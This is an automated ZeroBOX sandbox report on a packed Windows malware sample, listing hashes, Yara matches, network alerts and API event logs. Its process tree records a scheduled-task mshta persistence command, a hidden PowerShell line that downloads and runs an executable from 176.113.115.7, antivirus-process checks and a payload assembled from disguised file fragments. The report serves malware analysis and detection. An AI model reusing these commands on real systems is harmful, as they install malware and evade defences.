Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 24, 2025, 10:39 a.m.	March 24, 2025, 10:42 a.m.

Size	938.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`07ced6e7018c90a68a1d78b2ac01904d`
SHA256	`7c7b0011afc86dd97580dad216eacca0fb5c7b81b521ea8cafb52d99a67cee2a`
CRC32	`22B6EC28`
ssdeep	`24576:LqDEvCTbMWu7rQYlBQcBiT6rprG8a0gu:LTvC/MTQYxsWR7a0g`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file

random.exe "C:\Users\test22\AppData\Local\Temp\random.exe"
2548
- cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
  2600
  - schtasks.exe schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
    2704
- mshta.exe mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta
  2644
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    2808
    - TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE "C:\Users\test22\AppData\Local\TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE"
      3004
      - rapes.exe "C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe"
        148
        
        ZqkKpwG.exe "C:\Users\test22\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        2632
        
        zx4PJh6.exe "C:\Users\test22\AppData\Local\Temp\10286670101\zx4PJh6.exe"
        2760
        
        cmd.exe "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        2936
        
        tasklist.exe tasklist
        3024
        
        findstr.exe findstr /I "opssvc wrsa"
        2960
        
        tasklist.exe tasklist
        812
        
        findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        2084
        
        cmd.exe cmd /c md 440824
        2204
        
        extrac32.exe extrac32 /Y /E Architecture.wmv
        1508
        
        findstr.exe findstr /V "Offensive" Inter
        2588
        
        cmd.exe cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        2304
        
        cmd.exe cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        1316
        
        advnrNo.exe "C:\Users\test22\AppData\Local\Temp\10287840101\advnrNo.exe"
        560
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
176.113.115.6	Active	Moloch
176.113.115.7	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.101:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.101:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.101:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.101:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.101:49178	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.101:49178	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.101:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.113.115.7:80 -> 192.168.56.101:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 176.113.115.7:80 -> 192.168.56.101:49173	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 176.113.115.7:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 24, 2025, 10:39 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 91 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:39 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0
IsDebuggerPresent March 24, 2025, 10:40 a.m.			0	0

Command line console output was observed (50 out of 1794 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: SUCCESS: The scheduled task "uA50omaOMzx" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: Set console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: Discussed=L console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: EcGas console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'EcGas' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: YvIllustrations console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Premises(Tap(Bizarre(Feb(Fell( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'YvIllustrations' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: SYdBrandon console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Trust(Nu(Advertisement(Oil( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'SYdBrandon' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: rMDoMember console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Terminology(Innovative(Gambling( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'rMDoMember' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: aYMacro console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Associates(Monroe(Upon(Obligation(Catering(Cached( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'aYMacro' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: dAmYn console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Washing(Motorola(Desktops(Flour(Watches( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'dAmYn' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: bnXTab console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Infection(Block( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'bnXTab' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: Set console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: Arg=l console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: ojAppearing console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Fly(Louise(Plenty(Label(Fruits(Uniprotkb(Copyright(Valuable( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'ojAppearing' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: RoRoof console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Pace(Rescue(Revision( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'RoRoof' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: QwLike console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Carbon(Stainless( console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: 'QwLike' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: HmKMouth console_handle: 0x00000007	1	1
WriteConsoleW March 24, 2025, 10:39 a.m.	buffer: (Http(Inner(Page(Shopper(Transcription(Marilyn( console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cbb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cbb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cbb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cbb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cbb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cbb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060bff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060bff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060bff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060c9f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cc78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 24, 2025, 10:39 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0060cc78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 24, 2025, 10:39 a.m.		1	1	0

One or more processes crashed (50 out of 358 events)

Time & API	Arguments	Status
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x3290b9 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 3313849 exception.address: 0xb590b9 registers.esp: 2883084 registers.edi: 0 registers.eax: 1 registers.ebp: 2883100 registers.edx: 13647872 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 34 fc ff ff 81 f5 cb a3 68 9e 01 e9 5d 50 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x716e6 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 464614 exception.address: 0x8a16e6 registers.esp: 2883048 registers.edi: 1968898280 registers.eax: 27152 registers.ebp: 3999068180 registers.edx: 8585216 registers.ebx: 9047597 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 2a 00 00 00 b8 a1 57 d3 dc 01 c1 58 09 c8 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x7136c exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 463724 exception.address: 0x8a136c registers.esp: 2883052 registers.edi: 4294943132 registers.eax: 27152 registers.ebp: 3999068180 registers.edx: 241897 registers.ebx: 9074749 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 51 c7 04 24 a7 6e 44 62 89 0c 24 81 ec 04 00 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x72221 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 467489 exception.address: 0x8a2221 registers.esp: 2883052 registers.edi: 4294943132 registers.eax: 32127 registers.ebp: 3999068180 registers.edx: 462299170 registers.ebx: 9074749 registers.esi: 9084035 registers.ecx: 272472244	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 55 89 34 24 e9 fd fb ff ff 55 e9 e5 fa ff ff exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x726e4 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 468708 exception.address: 0x8a26e4 registers.esp: 2883052 registers.edi: 4294943132 registers.eax: 32127 registers.ebp: 3999068180 registers.edx: 462299170 registers.ebx: 0 registers.esi: 9054603 registers.ecx: 1259	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 82 07 00 00 59 01 e8 e9 04 05 00 00 5b e9 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x1f9b75 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2071413 exception.address: 0xa29b75 registers.esp: 2883052 registers.edi: 9086970 registers.eax: 31453 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 19398952 registers.esi: 10687623 registers.ecx: 296	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 13 00 00 00 8b 24 24 89 14 24 c7 04 24 a1 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x1fa4bf exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2073791 exception.address: 0xa2a4bf registers.esp: 2883052 registers.edi: 314345 registers.eax: 4294939204 registers.ebp: 3999068180 registers.edx: 2130566132 registers.ebx: 19398952 registers.esi: 10687623 registers.ecx: 296	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 50 89 0c 24 50 e9 ba 03 00 00 89 c8 59 29 c2 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x1fbbed exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2079725 exception.address: 0xa2bbed registers.esp: 2883052 registers.edi: 10667432 registers.eax: 28384 registers.ebp: 3999068180 registers.edx: 1549541099 registers.ebx: 0 registers.esi: 10687623 registers.ecx: 2048848688	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 c7 04 24 92 f1 22 6d 89 14 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x2029d9 exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2107865 exception.address: 0xa329d9 registers.esp: 2883052 registers.edi: 10669472 registers.eax: 10719272 registers.ebp: 3999068180 registers.edx: 96 registers.ebx: 10667458 registers.esi: 0 registers.ecx: 14288	1
__exception__ March 24, 2025, 10:39 a.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 51 52 e9 ab 01 00 00 b8 95 62 exception.symbol: tempplmrsqg8inq893hz1nhrvsn0k7rlijht+0x202e9b exception.instruction: sti exception.module: TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE exception.exception_code: 0xc0000096 exception.offset: 2109083 exception.address: 0xa32e9b registers.esp: 2883052 registers.edi: 10669472 registers.eax: 10695428 registers.ebp: 3999068180 registers.edx: 96 registers.ebx: 202985 registers.esi: 0 registers.ecx: 0	1
